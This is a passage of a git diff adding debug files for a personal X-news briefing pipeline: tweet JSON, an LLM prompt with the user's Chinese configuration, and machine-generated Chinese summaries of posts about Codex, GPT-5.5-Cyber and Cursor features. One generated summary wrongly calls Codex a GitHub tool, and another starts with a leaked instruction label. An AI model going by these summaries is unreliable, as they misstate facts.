Review for a strong out-of-the-box experience.\n\nSecurity agents draw from your existing usage pool. \n\nLearn more: http://cursor.com/docs/security-review" + }, + { + "idx": 60, + "handle": "sama", + "url": "https://x.com/sama/status/2049946120441520624", + "title": "big upgrade for codex today!\n\ntry it for non-coding computer work." + }, + { + "idx": 16, + "handle": "AravSrinivas", + "url": "https://x.com/AravSrinivas/status/2050007015616135365", + "title": "RT by @AravSrinivas: $AAPL CFO:\n\n“Leading AI developers like Perplexity are choosing Mac as their preferred platform to build enterprise-grade AI assistants that power autonomous agents and boost workplace productivity.”" + }, + { + "idx": 248, + "handle": "sama", + "url": "https://x.com/sama/status/2049493609028923826", + "title": "feels like codex is having a chatgpt moment" + } + ] +} \ No newline at end of file diff --git a/data/x_brief/debug/20260501_093436_l2_output.json b/data/x_brief/debug/20260501_093436_l2_output.json new file mode 100644 index 0000000..888c2e9 --- /dev/null +++ b/data/x_brief/debug/20260501_093436_l2_output.json @@ -0,0 +1,22 @@ +{ + "target_indexes": [ + 168, + 80, + 35, + 68, + 66, + 60, + 16, + 248 + ], + "broadcast_zh": [ + "OpenAI计划数日内向关键网络安全防御人员推出前沿模型GPT-5.5-Cyber,并将与各界及政府合作建立网络安全可信访问机制,旨在加速保护企业与基础设施安全。", + "中文新闻播报语气快讯:\n新兴AI模型Mythos及GPT-5.5-cyber等相关技术逐步应用于自动化网络安全任务,引发攻防能力提升。虽不能创造漏洞,但AI可加速漏洞发现与修复,短期内将触发网络安全技术升级周期,未来市场或趋于AI驱动的攻防力量平衡。", + "OpenAI GPT-5.5通过AI安全研究所多步网络攻击模拟测试,成为继Anthropic Mythos后第二个完整构建攻击链的模型。专家认为AI攻防能力提升将推动网络安全生态全面升级,强调防御方需优先部署技术以维持攻防平衡。", + "Cursor平台近日推出面向团队及企业用户的安全审查功能,通过两类全天候代理机制提升协作开发安全性:一类实时检测代码合并请求中的漏洞并自动反馈问题,另一类按计划扫描代码库并在Slack同步风险报告。", + "Cursor公司持续推进其代码安全审查功能的技术优化,通过整合用户现有资源提升系统审查效能。", + "Codex今日发布重大升级,新增非编程领域计算机任务处理功能,用户可体验其广泛适用性。", + "苹果公司CFO在回复中表示,行业领先的AI开发者正将Mac作为首选平台构建企业级人工智能助手,该技术可驱动自主代理系统并提升职场生产力。", + "GitHub旗下代码生成AI工具Codex近期迎来类似ChatGPT的突破性进展,引发行业关注。" + ] +} \ No newline at end of file diff --git a/data/x_brief/debug/20260502_033836_l1_stage1_input.txt b/data/x_brief/debug/20260502_033836_l1_stage1_input.txt new file mode 100644 index 0000000..9a5d7f4 --- /dev/null +++ b/data/x_brief/debug/20260502_033836_l1_stage1_input.txt @@ -0,0 +1,454 @@ +[meta] + +tweets=120 + +tweet_summary_chars=106473 + +phase=stage1_draft + + + +[prompt] + +你是“X资讯月报总编”。请先产出“结构草案 JSON”(阶段1),供后续阶段2定稿使用。 + +你必须遵循“用户配置文档”的偏好: +- 优先覆盖“我现在最关心的事”; +- 按“账号权重与偏好”做信息优先级排序(高权重账号更容易进入 themes/p0); +- 按“内容类型偏好(✅/❌)”进行取舍; +- 尽量贴合“简报格式偏好”的表达风格(中文总结为主,保留关键英文原句); +- 页面是固定模块位,内容应服务于前端模块整合,不要输出散乱信息。 + +阶段1输出要求(仅草案): +1) 只输出 JSON 对象,不要 markdown,不要解释文字。 +2) 使用如下字段(严格保持键名): +{ + "headline":"今日一句话总结,<40字,点出主旋律", + "trending_keywords":["关键词1","关键词2","关键词3"], + "themes":[{"id":"t1","title":"...","subtitle":"...","priority":"P0|P1|P2","bullets":["..."],"sample_urls":["..."]}], + "p0_events":[{"id":"p01","title":"...","meta":"...","summary":"...","url":"..."}], + "top_quotes":[{"id":"q1","quote":"...","speaker":"...","date":"...","note":"...","url":"..."}], + "category_updates":[{"id":"c1","title":"...","subtitle":"...","level":"P0|P1|P2|WARN","item_urls":["..."],"item_texts":["..."]}], + "risk_signals":[{"id":"r1","level":"HIGH|MID|OPP","title":"...","detail":"..."}] +} +3) 数量限制:themes=3, p0_events<=6, top_quotes<=3, category_updates<=6, risk_signals<=6。 +4) trending_keywords:3-6 个当期最热词条(中英均可),直接从推文内容提炼。 +5) themes 的 priority 字段:首个主题通常为 P0,其余为 P1/P2;根据重要性自判。 +6) 每个模块优先包含可验证 URL;无法确定时宁缺毋滥。 +7) 内容必须中文,简洁可执行。 +8) JSON 必须合法:双引号、无注释、无尾逗号。 + +用户配置文档(用于本次简报编排): +# 我的 X 资讯简报配置 +> 这是一份活的文档。你可以随时手动编辑,Claude 也会根据你的阅读行为自动更新行为日志和权重建议。 +> 设计参考:Karpathy 的 LLM Wiki 模式——知识预编译,随时间积累。 + +**创建日期**:2026-04-26 +**最后更新**:2026-04-29(新增 Cursor 官方账号 + 17位中文区博主;华语圈从3人扩充至20人) + +--- + +## 一、我现在最关心的事 +> 这是简报的核心过滤器。Claude 在筛选和总结推文时,会优先选出和这里相关的内容放进主题卡片。 + +- 探索 AI 工具在投资研究和期权分析中的实际应用 +- 寻找值得在 B站分享的开源项目和 AI 工具(能快速跑通、有演示效果的优先) +- 跟上 AI 编程工具的发展(Claude Code、Cursor、Agent 相关) +- 了解顶级 VC 和行业领袖对 AI 下一步方向的判断 +- 关注 A股和美股宏观叙事的变化(尤其是科技板块) + +--- + +## 二、账号权重与偏好 + +> 权重分三档:高 / 中 / 低 +> 高权重账号:内容优先进入主题卡片 +> 中权重账号:有足够价值时进入快速扫读 +> 低权重账号:仅在有明确高价值内容时出现 + +### AI 行业 + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @karpathy | Andrej Karpathy | 高 | 技术深度、可操作项目、AI编程实践 | 质量极高,几乎每条都值得看 | +| @sama | Sam Altman | 高 | 行业方向、产品发布 | 信息密度高,观点有参考价值 | +| @DarioAmodei | Dario Amodei | 高 | Anthropic动向、AI安全与能力 | Anthropic CEO,和Claude直接相关 | +| @AravSrinivas | Aravind Srinivas | 高 | AI产品方向、搜索与Agent | Perplexity CEO,活跃度高 | +| @AndrewYNg | Andrew Ng | 高 | 学习资源、AI教育、应用落地 | 对理解AI应用场景有帮助 | +| @cursor_ai | Cursor | 中 | 产品更新、功能发布、Cursor生态 | 新增;AI编程工具官方账号,主线之一 | +| @ylecun | Yann LeCun | 中 | 研究方向、学术争论 | 偶尔有深度洞见,但争论性内容较多 | +| @JeffDean | Jeff Dean | 中 | 研究进展、Google AI动向 | 更新频率低,但含金量高 | +| @soumithchintala | Soumith Chintala | 中 | 开源框架、技术工具 | PyTorch相关,关注技术底层 | +| @gregbrockman | Greg Brockman | 中 | OpenAI产品动向 | 更新较少,有则关注 | +| @GaryMarcus | Gary Marcus | 低 | AI批评与反思 | 有参考价值但以质疑为主 | +| @elonmusk | Elon Musk | 低 | 偶尔有AI/科技相关 | 噪音多,仅关注有实质内容的推文 | + +### VC / 投资人 + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @paulg | Paul Graham | 高 | 创业思维、长文洞见 | 更新少但质量极高,每条都值得读 | +| @naval | Naval Ravikant | 高 | 思维框架、财富哲学 | 更新不频繁,但思想密度高 | +| @pmarca | Marc Andreessen | 高 | AI/科技政策、VC判断、行业叙事 | a16z联合创始人,极其活跃,2.1M粉 | +| @david_tiantian | David Tian Wang | 中 | 宏观分析、市场判断 | 账号实际发帖量约42条,活跃度一般 | +| @morganhousel | Morgan Housel | 中 | 投资心理、长期主义、行为金融 | 《Psychology of Money》作者 | +| @eladgil | Elad Gil | 中 | AI投资趋势、公司判断 | 偶有高质量行业洞见 | +| @DavidSacks | David Sacks | 中 | 科技政策、VC视角 | 观点有时偏政治,筛选后看 | +| @HarryStebbings | Harry Stebbings | 低 | VC动态 | 内容较泛,权重低 | +| @jason | Jason Calacanis | 低 | 创业生态 | 噪音较多 | + +### 宏观与交易 + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @charliebilello | Charlie Bilello | 高 | 宏观数据图表、资产类别轮动 | 每天发图表分析,数据驱动;贴近A股/美股宏观叙事主线 | +| @WarriorTrading | Warrior Trading | 低 | 日内交易技术 | 偏教育/营销内容 | +| @CryptoCred | Credible Crypto | 低 | 加密趋势分析 | 加密相关,权重偏低 | +| @AltcoinBuzz | AltcoinBuzz | 低 | 币圈媒体 | 偏媒体性质,优先级低 | + +### 华语圈 + +> ✅ 以下所有账号均为英文 handle,Nitter RSS 和 xint 均可正常抓取,无需 X API 补充。 +> ⚠️ 例外:@二级炒家 仍为中文 handle,需走 X API 通道。 + +#### 华语圈 · AI 编程 / 工具(与用户核心兴趣高度重叠) + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @svwang1 | 王川(硅谷) | 高 | 科技投资观察、深度思考 | 质量高,思考密度接近英文圈顶级账号 | +| @bozhou_ai | 泊舟 | 高 | 智能体构建、提示词、AI编程实践 | 新增;AI程序员+氛围编程践行者,2.1万粉,内容实操性强 | +| @lxfater | 铁锤人 | 高 | AI工具、开源项目、创业实践 | 新增;GitHub 3万星热门项目作者,B站内容参考价值高 | +| @berryxia | Berryxia | 高 | AI工具、系统提示词、设计美学 | 新增;提示词研究深度高,和用户兴趣直接对齐 | +| @Pluvio9yte | 雪踏乌云 | 高 | 氛围编程、AI编程技巧、产品出海 | 新增;大厂开发者视角,实操经验丰富 | +| @liuliu | 刘进 | 中 | VC投资、华语科技圈 | 技术洞见高质量,但更新频率偏低 | +| @CuiMao | CuiMao | 中 | 深度学习、NVIDIA生态、ComfyUI工作流 | 新增;技术深度强,ComfyUI方向与AI工具主线相关 | +| @0xAA_Science | 0xAA | 中 | Web3教育、开源项目、AI+Web3交叉 | 新增;北大计算机博士,WTF Academy发起人,技术可信度高;偏Web3但有AI视角 | + +#### 华语圈 · 独立创作者 / 产品人 + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @dingyi | Ding | 中 | 独立产品、SaaS工具、产品设计 | 新增;SaasPick/TopFeed作者,全网15万粉,出海产品实战参考 | +| @GoSailGlobal | Jason Zhu | 中 | SaaS出海、AI资讯、Agent资源站 | 新增;独立开发者,搭建AI Agent聚合资源站,出海视角有参考价值 | +| @frxiaobei | 凡人小北 | 中 | AI战略咨询、AIGC商业落地 | 新增;商业+战略顾问背景,关注真实商业场景的AI落地,偏B端视角 | +| @gkxspace | 余温 | 中 | AI产品商业化、从0到1创业 | 新增;05年连续创业者,已有AI项目七位数营收,创业实战参考价值高 | +| @Stv_Lynn | Steven Lynn | 中 | 科技播客、AI社区活动 | 新增;FirstLabAI播客主持人+Crazy Saturday主办者,华语AI圈社交节点 | +| @chuxiaeth | 初夏 | 中 | AI学习分享、个人成长 | 新增;Cursor资助创作者,内容质量待观察,初设中权重 | + +#### 华语圈 · Crypto / 链上(低权重,仅关注AI交叉内容) + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @二级炒家 | 二级炒家 | 高 | A股宏观、市场判断 | 和投资主线直接相关;⚠️ 中文handle,需X API | +| @wolfyxbt | 杀破狼 | 低 | 氛围编程、链上数据、Meme币 | 新增;表达一针见血,但主线偏Meme币;仅关注AI编程相关内容 | +| @runes_leo | Leo | 低 | 比特币生态、链上量化 | 新增;AI+Crypto独立建设者,主线偏比特币生态,AI交叉内容才关注 | +| @oranges | 比特币橙子 | 低 | 比特币、AI工具(OwlClawHub) | 新增;搭建了AI智能体工具集,但主业是加密投资;仅关注AI工具相关 | +| @realNyarime | 奶昔 | 低 | eSIM技术、社区运营 | 新增;主业eSIM和奶昔社区,与简报主线相关性低;暂设低权重观察 | + +--- + +## 三、内容类型偏好 + +### ✅ 优先展示 +- **可操作的项目/工具**:有 GitHub 链接、可以立刻尝试的内容 +- **AI 编程实践**:提示词技巧、Agent 搭建、工作流分享 +- **行业方向判断**:顶级 VC 或创始人对未来的预测和押注 +- **宏观与投资叙事**:A股、美股科技板块的结构性变化 +- **中文圈独特视角**:英文圈没有的本地化洞见 + +### ❌ 降低优先级 +- 纯政治观点(和 AI/投资无关的) +- 加密货币炒作、价格预测类 +- 互相转发的无实质内容互动 +- 重复已知信息的科普 + +--- + +## 四、简报格式偏好 + +``` +📰 AI & 投资日报 · [日期] + +【30秒总览】一句话概括今日主旋律 + +━━━━━━━━━━━━━ +🔥 今日主题卡片(2~3个) +每张卡片包含: + - 主题标签 + - 核心洞见(1~2句) + - 来源账号 + - 你可以做什么(可操作建议) + +━━━━━━━━━━━━━ +⚡ 快速扫读(剩余有价值内容) + +━━━━━━━━━━━━━ +🀄 华语圈单独板块 + +━━━━━━━━━━━━━ +📌 本期可以跟着做的事 + +━━━━━━━━━━━━━ +😴 今日无新内容的账号 +``` + +**语言**:中文总结为主,保留有分量的英文原句 +**长度**:10分钟内可以读完 +**主题卡片数量**:每日 2~3 个,宁缺毋滥 + +--- + +## 五、行为日志 +> 由 Claude 根据你的互动自动追加。记录有意义的偏好信号,作为未来权重调整的依据。 + +| 日期 | 行为 | 内容摘要 | 影响 | +|------|------|----------|------| +| 2026-04-26 | 初始配置建立 | 人工设定初始权重 | — | +| 2026-04-28 | 账号列表核查优化 | Web搜索核查全部33个账号的真实性与活跃度 | 修正7处、新增5个、删除7个 | +| 2026-04-29 | 批量新增华语圈博主 | 添加Cursor官方账号 + 15位Cursor资助中文区创作者 + 1位用户自荐(@chuxiaeth) | 总账号数从33增至51;华语圈从3扩充至20;新增AI编程/工具高权重博主4个 | + +--- + +## 六、待解决的遗留问题 +> 系统尚未实现的功能,记录在此,后续迭代时参考。 + +- [ ] 账号内容类型自动分类(通用知识型 vs 项目介绍型),不同类型反馈权重不同 +- [ ] 点踩行为如何自动写回本文件并影响下次抓取权重 +- [ ] 新账号发现与加入机制(何时、如何引入新的关注对象) +- [ ] 账号沉默超过 N 天自动降权的规则实现 +- [ ] 新加入的华语圈账号经过 2 周观察后,根据实际内容质量调整权重 + +上下文(摘要): +# X平台关注列表推文汇总 + +**生成日期**: 2026-05-01T19:38:36.469180+00:00 +**数据来源**: Nitter RSS 订阅 +**时间范围**: 最近7天 +**账号总数**: 44 | **成功获取**: 34 | **推文总数**: 478 + +--- + +### ✅ @karpathy — Andrej Karpathy(3 条) + +**[2026-04-30T17:43:06+00:00]** +> This is the the quote I've been citing a lot recently. +[原文链接](https://x.com/karpathy/status/2049907410303865030) + +**[2026-04-30T17:28:50+00:00]** +> Fireside chat at Sequoia Ascent 2026 from a ~week ago. Some highlights: The first theme I tried to push on is that LLMs are about a lot more than just speeding up what existed before (e.g. coding). T… +[原文链接](https://x.com/karpathy/status/2049903821095354523) + +**[2026-04-27T21:34:34+00:00]** +> RT by @karpathy: New work with @AlecRad and @DavidDuvenaud: Have you ever dreamed of talking to someone from the past? Introducing talkie, a 13B model trained only on pre-1931 text. Vintage models sh… +[原文链接](https://x.com/karpathy/status/2048878495539843211) + +--- + +### ✅ @sama — Sam Altman(20 条) + +**[2026-05-01T18:01:58+00:00]** +> you know what all of these "which is better" polls are silly use codex or claude code, whatever works best for you i am grateful we live in a time with such amazing tools, and grateful there is a cho… +[原文链接](https://x.com/sama/status/2050274547061129577) + +**[2026-05-01T15:18:10+00:00]** +> RT by @sama: Don't join a company or industry that has contempt for its customers. You can make a lot of money that way, and of course it gives you a feeling of superiority, but you'll never do great… +[原文链接](https://x.com/sama/status/2050233324963008553) + +**[2026-05-01T15:01:14+00:00]** +> R to @sama: i'm hopeful for a future where people who want to work really hard have incredibly fulfilling things to do, and people who don't want to work hard don't have to and can still have an amaz… +[原文链接](https://x.com/sama/status/2050229060887044494) + +**[2026-05-01T15:01:13+00:00]** +> R to @sama: i think a lot of people are going to be busier (and hopefully more fulfilled) than ever, and jobs doomerism is likely long-term wrong. though of course there will be disruption/significan… +[原文链接](https://x.com/sama/status/2050229059507159242) + +**[2026-05-01T15:01:13+00:00]** +> we want to build tools to augment and elevate people, not entities to replace them. +[原文链接](https://x.com/sama/status/2050229058425045178) + +**[2026-05-01T01:17:03+00:00]** +> artificial goblin intelligence achieved +[原文链接](https://x.com/sama/status/2050021650641695108) + +**[2026-04-30T20:16:55+00:00]** +> big upgrade for codex today! try it for non-coding computer work. +[原文链接](https://x.com/sama/status/2049946120441520624) + +**[2026-04-30T20:12:24+00:00]** +> it does seem cool +[原文链接](https://x.com/sama/status/2049944981750833659) + +**[2026-04-30T19:23:47+00:00]** +> RT by @sama: Computer Use runs this use case 42% faster in today's Codex app update. +[原文链接](https://x.com/sama/status/2049932746567598472) + +**[2026-04-30T19:08:00+00:00]** +> RT by @sama: It's never been easier to do everyday work with Codex. Choose your role, connect the apps you use every day, and try suggested prompts. Codex helps with everything from research and plan… +[原文链接](https://x.com/sama/status/2049928776147230886) + +**[2026-04-30T17:29:15+00:00]** +> lisan say more mean things about us you're being too nice +[原文链接](https://x.com/sama/status/2049903925311267311) + +**[2026-04-30T05:56:16+00:00]** +> RT by @sama: When future historians write about Silicon Valley, they’ll have an entire chapter dedicated to the Ron Conway way: how he turned generosity, warmth, and showing up for founders into a wi… +[原文链接](https://x.com/sama/status/2049729530059960571) + +**[2026-04-30T04:59:15+00:00]** +> alignment failure +[原文链接](https://x.com/sama/status/2049715178611380317) + +**[2026-04-30T04:46:56+00:00]** +> we're starting rollout of GPT-5.5-Cyber, a frontier cybersecurity model, to critical cyber defenders in the next few days. we will work with the entire ecosystem and the government to figure out trus… +[原文链接](https://x.com/sama/status/2049712078836170843) + +**[2026-04-30T03:27:12+00:00]** +> R to @sama: openai.com/index/where-the-g… +[原文链接](https://x.com/sama/status/2049692014586048973) + +**[2026-04-30T03:27:08+00:00]** +> goblinblog dropped +[原文链接](https://x.com/sama/status/2049691999444639872) + +**[2026-04-30T03:18:22+00:00]** +> RT by @sama: This GPT Image 2 prompt is going insanely viral right now. “Redraw the attached image in the most clumsy, scribbly, and utterly pathetic way possible. Use a white background, and make it… +[原文链接](https://x.com/sama/status/2049689793118998717) + +**[2026-04-30T00:55:24+00:00]** +> R to @sama: we will have it at our SF HQ and pay for plane tickets & hotel for people who aren't local. we'll close the link tomorrow at 5:55 pm. +[原文链接](https://x.com/sama/status/2049653814463168638) + +**[2026-04-30T00:55:23+00:00]** +> GPT-5.5 is going to have a party for itself. it chose 5/5 at 5:55 pm for the date and time. if you'd like to come, let us know here: https://luma.com/5.5 codex will help the team pick people from the… +[原文链接](https://x.com/sama/status/2049653810558353746) + +**[2026-04-29T14:19:33+00:00]** +> R to @sama: i meant a goblin moment, sorry +[原文链接](https://x.com/sama/status/2049493797114126484) + +--- + +### ✅ @DarioAmodei — Dario Amodei(0 条) + +--- + +### ✅ @AravSrinivas — Aravind Srinivas(7 条) + +**[2026-05-01T03:22:08+00:00]** +> Computer plays the orchestra +[原文链接](https://x.com/AravSrinivas/status/2050053128452456584) + +**[2026-05-01T03:04:54+00:00]** +> Video +[原文链接](https://x.com/AravSrinivas/status/2050048790908785072) + +**[2026-04-30T17:42:35+00:00]** +> RT by @AravSrinivas: The best hedge fund PMs compare views from different research analysts. Now you can do that in 2 minutes with Equity Research Council in Perplexity Computer. This workflow pulls … +[原文链接](https://x.com/AravSrinivas/status/2049907277646160333) + +**[2026-04-28T16:05:11+00:00]** +> RT by @AravSrinivas: Today we’re rolling out a new native Comet experience for iPad. Comet now works naturally with iPadOS features like multiple windows and Split View, so you can work with Comet al… +[原文链接](https://x.com/AravSrinivas/status/2049157990604025896) + +**[2026-04-28T15:38:49+00:00]** +> R to @AravSrinivas: reddit.com/r/GeminiAI/commen… +[原文链接](https://x.com/AravSrinivas/status/2049151356985040934) + +**[2026-04-28T15:38:28+00:00]** +> A Google Earth + Flight Simulator, fully cooked by Perplexity Computer with Codex/CC as subagents inside it. GTA vibes. +[原文链接](https://x.com/AravSrinivas/status/2049151268606894310) + +**[2026-04-24T21:24:24+00:00]** +> You would consume less computer credits (and be able to run more tasks as a result) if you switched to GPT-5.5 as your default orchestrator. This was the number one complaint about Computer (being cr… +[原文链接](https://x.com/AravSrinivas/status/2047788775468908840) + +--- + +### ✅ @AndrewYNg — Andrew Ng(2 条) + +**[2026-04-30T16:21:35+00:00]** +> Pinned: How we prompt AI is very different in 2026 than 2022 when ChatGPT came out. I'm teaching a new course, AI Prompting for Everyone, to help you become an AI power user — whatever your current s… +[原文链接](https://x.com/AndrewYNg/status/2049886895530967534) + +**[2026-04-27T15:58:13+00:00]** +> AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to… +[原文链接](https://x.com/AndrewYNg/status/2048793852702757151) + +--- + +### ✅ @cursor_ai — Cursor(12 条) + +**[2026-04-30T18:58:07+00:00]** +> R to @cursor_ai: We’re continuing to improve the runtime, harness, and models powering Cursor Security Review for a strong out-of-the-box experience. Security agents draw from your existing usage poo… +[原文链接](https://x.com/cursor_ai/status/2049926287439929475) + +**[2026-04-30T18:58:06+00:00]** +> R to @cursor_ai: Customize these Cursor-managed security agents to match your team’s requirements. Adjust triggers, add your own instructions, give them custom tooling, and choose how outputs are sha… +[原文链接](https://x.com/cursor_ai/status/2049926285518848093) + +**[2026-04-30T18:58:06+00:00]** +> Cursor Security Review is now available for Teams and Enterprise plans. Run two types of always-on agents: 1. Security Reviewer checks every PR for vulnerabilities and leaves comments. 2. Vulnerabili… +[原文链接](https://x.com/cursor_ai/status/2049926283061035254) + +**[2026-04-30T17:19:22+00:00]** +> Our agent harness makes models inside Cursor faster, smarter, and more token-efficient. Here's how we test improvements to the harness, monitor and repair degradations, and customize it for different… +[原文链接](https://x.com/cursor_ai/status/2049901436918436249) + +**[2026-04-29T14:43:43+00:00]** +> R to @cursor_ai: Customers like Rippling, Notion, C3 AI, and Faire are using the Cursor SDK to build custom background agents, take bugs from ticket to merge-ready PR, and maintain self-healing codeb… +[原文链接](https://x.com/cursor_ai/status/2049499876388454903) + +**[2026-04-29T14:43:42+00:00]** +> R to @cursor_ai: We've open-sourced a few starter projects for you to build on: a coding agent CLI, a prototyping tool, and an agent-powered kanban board. Use Cursor to customize them for your use ca… +[原文链接](https://x.com/cursor_ai/status/2049499874043830389) + +**[2026-04-29T14:43:42+00:00]** +> R to @cursor_ai: With the Cursor SDK, you can run agents locally or deploy them in our cloud. +[原文链接](https://x.com/cursor_ai/status/2049499871980200082) + +**[2026-04-29T14:43:40+00:00]** +> We’re introducing the Cursor SDK so you can build agents with the same runtime, harness, and models that power Cursor. Run agents from CI/CD pipelines, create automations for end-to-end workflows, or… +[原文链接](https://x.com/cursor_ai/status/2049499866217185492) + +**[2026-04-24T19:48:34+00:00]** +> R to @cursor_ai: Download Cursor 3.2 to try these new features in the agents window: http://cursor.com/download +[原文链接](https://x.com/cursor_ai/status/2047764656165646786) + +**[2026-04-24T19:48:33+00:00]** +> R to @cursor_ai: We've also added multi-root workspaces for cross-repo changes. A single agent session can now target a reusable workspace made of multiple folders. +[原文链接](https://x.com/cursor_ai/status/2047764654760632725) + +**[2026-04-24T19:48:33+00:00]** +> R to @cursor_ai: Another way to parallelize work is with new and improved worktrees in the agents window. Run isolated tasks in the background across different branches. When you're ready to test cha… +[原文链接](https://x.com/cursor_ai/status/2047764652977958938) + +**[2026-04-24T19:48:33+00:00]** +> Introducing /multitask in the new Cursor 3 interface. Cursor can now run async subagents to parallelize your requests instead of adding them to the queue. For already queued messages, you can ask Cur… +[原文链接](https://x.com/cursor_ai/status/2047764651363180839) + +--- + +### ✅ @ylecun — Yann LeCun(20 条) + +**[2026-05-01T10:36:08+00:00]** +> RT by @ylecun: All the Doomers and hawks are lining up behind this distillation "attack" farce because they want to see open source banned. It's really as simple as that. They want to take away your … +[原文链接](https://x.com/ylecun/status/2050162348891979817) + +**[2026-05-01T00:42:44+00:00]** +> RT by @ylecun: I think the expression is “pulling the ladder”! All labs trained their models by distilling (at the very least distilling the web) which allowed them to become the fastest growing busi… +[原文链接](https://x.com/ylecun/status/2050013015680995631) + +**[2026-04-30T11:02:45+00:00]** +> RT by @ylecun: ✨🧠 Tribe v2, our latest model of human brain responses to sound, sight and language can now be (partly) explored on your phone📱: ▶️demo: https://aidemos.atmeta.com/tribev2/ 📄paper: htt… +[原文链接](https://x.com/ylecun/status/2049806660001022372) + +**[2026-04-30T06:58:24+00:00]** +> RT by @ylecun: These folks are trying to ban open source. They're looking to take away your freedom to choose. They're also looking to take away the rights of businesses like Cursor to fine tune and … +[原文链接](https://x.com/ylecun/status/2049745165665853742) + +**[2026-04-30T00:05:29+00:00]** +> Trump's war on science. +[原文链接](ht + +推文样本(JSON): +[{"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-05-01T19:28:41+00:00", "title": "If you think you are going to get alignment out of LLMs you are sadly mistaken.\n\nIf you live in a society in which people are rolling out LLMs at massive scale, without a robust solution to alignment (or even managing gremlins) you’re probably fucked.\n\nResist the proliferation of", "url": "https://x.com/GaryMarcus/status/2050296366161940584"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T19:26:58+00:00", "title": "Important, and obviously true. https://psyche.co/ideas/have-online-worlds-become-the-last-free-places-for-children", "url": "https://x.com/pmarca/status/2050295934920302777"}, {"handle": "Stv_Lynn", "name": "Steven Lynn", "published_at": "2026-05-01T18:47:37+00:00", "title": "Media", "url": "https://x.com/Stv_Lynn/status/2050286033552736527"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-05-01T18:43:18+00:00", "title": "Enjoyed visiting MSG South in the seventh borough, Atlanta, last night… see y’all in the sixth borough (Philly) where we will beat the @sixers in six games \n\n@GovernorShapiro @david_adelman care to be my some of those nasty cheesesteaks for some bagels?! 😂\n\n[ sorry @celtics, you ", "url": "https://x.com/jason/status/2050284947345486290"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-05-01T18:41:17+00:00", "title": "AI and GDP - what does it mean?\n\nSure, AI is “contributing” to GDP — but @davidsacks really nails it below, “Paying people to dig holes and fill them back up increases GDP, as it is currently measured, even though that activity has no value.”\n\nIn the case of AI, GDP is going up ", "url": "https://x.com/GaryMarcus/status/2050284439343862266"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-05-01T18:31:06+00:00", "title": "哈哈 @OpenAI 官号换掉了banner了\n很明显,他们想再一次用这种画风重新走一遍当时4o宫崎骏现象级爆款。难,难啊。", "url": "https://x.com/CuiMao/status/2050281878322811194"}, {"handle": "0xAA_Science", "name": "0xAA", "published_at": "2026-05-01T18:31:03+00:00", "title": "一直想要个越野摩托车,这次张雪出了 MX250,支持一下。", "url": "https://x.com/0xAA_Science/status/2050281865245024365"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-05-01T18:25:15+00:00", "title": "Bill, the Knicks have won the east", "url": "https://x.com/jason/status/2050280406461677908"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-05-01T18:22:55+00:00", "title": "One of the things I hate the most about this site is the consistent lack of nuance.\n\nThat’s why everything is an argument, and progress here is so rare.", "url": "https://x.com/GaryMarcus/status/2050279819347448258"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-05-01T18:21:24+00:00", "title": "I have many beefs with Dario and don’t trust him or his hype — but he has certainly eaten OpenAI’s lunch, despite their immense initial lead.\n\nMaybe “clown” isn’t the right word here.", "url": "https://x.com/GaryMarcus/status/2050279436717785406"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T18:08:02+00:00", "title": "Concerning.", "url": "https://x.com/pmarca/status/2050276070952517767"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-05-01T18:04:30+00:00", "title": "Meta is basically Black Mirror incarnate.", "url": "https://x.com/GaryMarcus/status/2050275183223857462"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-05-01T18:04:01+00:00", "title": "“Marcus’ specific point about coding is structurally important: a model that produces code which compiles and passes the tests it was given is not the same as a model that produces correct, secure, maintainable, well-architected software. The first is verifiable in seconds; the s", "url": "https://x.com/GaryMarcus/status/2050275059361792137"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-05-01T18:01:58+00:00", "title": "you know what\n\nall of these \"which is better\" polls are silly\n\nuse codex or claude code, whatever works best for you\n\ni am grateful we live in a time with such amazing tools, and grateful there is a choice", "url": "https://x.com/sama/status/2050274547061129577"}, {"handle": "liuliu", "name": "刘进", "published_at": "2026-05-01T17:33:05+00:00", "title": "What's harder for outsiders to understand is the falling of Deep Research inside @GeminiApp. On the other hand, Deep Research in @OpenAI is improving. Even so, nothing matches what Deep Research used to be around this time last year. It is a sad product story.", "url": "https://x.com/liuliu/status/2050267276893708414"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-05-01T17:30:46+00:00", "title": "Elon Musk, Sam Altman, the future of humanity, and … goblins.\n\nTerrific interview @theinformation with @rocketalignment \n\nhttps://www.youtube.com/live/zh70d6CyuCo?si=WIZJnwKnYEy5Pugl", "url": "https://x.com/GaryMarcus/status/2050266692732014689"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-05-01T17:18:23+00:00", "title": "Last 10 Years\nNVIDIA $NVDA: +22,875%\nBitcoin $BTC: +17,205%\n$AMD: +10,030%\nTesla $TSLA: +2,362%\nApple $AAPL: +1,233%\nGoogle $GOOGL: +999%\nNetflix $NFLX: +932%\nMicrosoft $MSFT: +844%\nAmazon $AMZN: +717%\nMeta: $META: +425%\nS&P 500 $SPY: +312%\nGold $GLD: +245%\nUS Inflation: +39%", "url": "https://x.com/charliebilello/status/2050263578188333549"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": 